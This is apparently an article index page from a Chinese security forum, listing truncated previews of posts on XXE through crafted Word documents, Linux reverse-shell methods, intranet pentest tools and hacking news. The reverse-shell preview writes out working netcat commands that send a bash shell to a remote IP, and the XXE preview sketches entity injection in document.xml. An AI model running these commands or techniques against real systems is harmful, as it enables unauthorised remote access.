文章列表
利用doc来实现xxe
首先是一个正常的doc文档当将这一个doc文档改成zip,再解压后就会发现doc文档就是一堆xml文件组成的在word文件夹里打开document.xml可以发现doc里的内容都在<w:t></w:t>里构造实体,并在<w:t></w:t>里引用实体来实现xxe实体定义:<!DOCTYPE document > 实体引用:<w:t>&xxe;</w:t>在0ctf一道题里的效
Linux下反弹的10种方法
转载的自Kaotic Creations,http://kaoticcreations.blogspot.kr/2012/01/bind-back-connect-reference-guide.html方法1. SHELL执行: nc 192.168.1.133 8080 -e /bin/bash监听执行 :nc -n -vv -l -p 8080方法2:SHELL执行:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>ba
美媒:俄罗斯黑客入侵白宫计算机系统
据美国有线新闻网(CNN)报道,有美国官员称,近几个月俄罗斯黑客已破坏性地入侵美国国务院计算机网络,同时还借此侵入白宫计算机系统的敏感部分。白宫已表示入侵仅影响到非机密系统,但有美国媒体称这样的表述掩饰了入侵的严重性。黑客获得了如未公开的美国总统奥巴马真实行程细节等敏感信息。也有美国
【纽约时报】黑客入侵索尼影视后 学乖了的好莱坞开始重视数据安全
几十年来,露露·芝泽(Lulu Zezza)一直都在扮演好莱坞最困难的角色之一。除了管理《朗读者》和《九》这些电影的实际制作外,芝泽还负责监督电影制作流程中的各种数据安全,包括电影预算、挑选演员、拍摄日程以及电影剧本。就在不久之前,保守住好莱坞的秘密还是件相当简单的事。等到电影拍摄一结束,
内网渗透几个小工具
好久没有发帖了,出来冒泡~++++++++++++++++++++++++++++++++++++++++++++++++++++++++++一)前言昨天搞站,shell是windows的administrator权限,但是反弹不出来。所有东西全在命令行上面玩。凤凰扫描器扫除几个smb和ssh的口令++++++++++++++++++++++++++++++++++++++++++++++++++++++++++二)小工具1.p
![[观点]所谓的“PHP任意文件上传漏洞”的驳斥与国内安全娱乐圈之我见](https://www.t00ls.com/attachments/month_1504/1504041322ec81b9e3cdc3ba19.gif)
[观点]所谓的“PHP任意文件上传漏洞”的驳斥与国内安全娱乐圈之我见
前几天微博、各大媒体上突然冒出来一个“PHP任意文件上传漏洞(CVE-2015-2348)”,打开看过之后发现,确实是前段时间出来的一个漏洞。这篇文章由信息安全界“知名”媒体Freebuf首先出来炒,之后360也不甘示弱,腾讯紧跟其后,炒的不亦乐乎。这大概是很多不明真相的同学们眼中的CVE-2015-2348。我是一
一季度号已限,希望大家珍惜帐号
一季度限号如期进行,如下帐号已经被限制访问。不满足条件者(162人):@凋凌玫瑰、@tianci2007、@czy82、@冰sugar、@xiaodao、@new4、@xl7y、@darkray、@k@i、@Porsche、@大虫、@yiz、@lllyyy、@小冰、@miyuhan、@open、@ps7isy、@tnt1200、@HDCnak、@T00ls小柯、@cclsoft、@tools小强、@心灵、@xiaokis
美国的网络“厚黑学”
美国总统奥巴马日前签署行政命令,授权相关机构对攻击美国网络系统的海外黑客实施制裁,而且还要惩罚那些在知情情况下从网络间谍活动中受益的公司。奥巴马甚至还点名,称中国、俄罗斯和伊朗是网络攻击主要来源。奥巴马的理由是什么呢?他说:“他们(黑客)对我们的安全和经济构成严重威胁,破坏关键的
Chrome、火狐浏览器宣布删除CNNIC数字证书
谷歌4月1日更新了安全博客,宣布旗下产品将删除中国互联网信息中心(CNNIC)数字证书。而Firefox(火狐浏览器)也发布了类似声明。Google与火狐先后发表声明称,它们旗下的浏览器,将停止信任来自中国互联网络信息中心(CNNIC)颁发的数字证书。而中国互联网信息中心(CNNIC)目前是中国最大的数字证书颁发
那个攻陷IE的黑客:爱看美剧的mj0011
图为360Vulcan团队在比赛现场,右二为郑文彬。4月2日,在酒仙桥附近360大厦18楼的一个会议室里,郑文彬穿一件黄黑相间的长袖体恤衫安静地与记者隔着桌子相对而坐。面前的这个大男孩代号mj0011,是360Vulcan黑客团队的领头人。这个来自中国的团队在3月19日世界Pwn2Own黑客大赛上仅用17秒就一举攻破了微
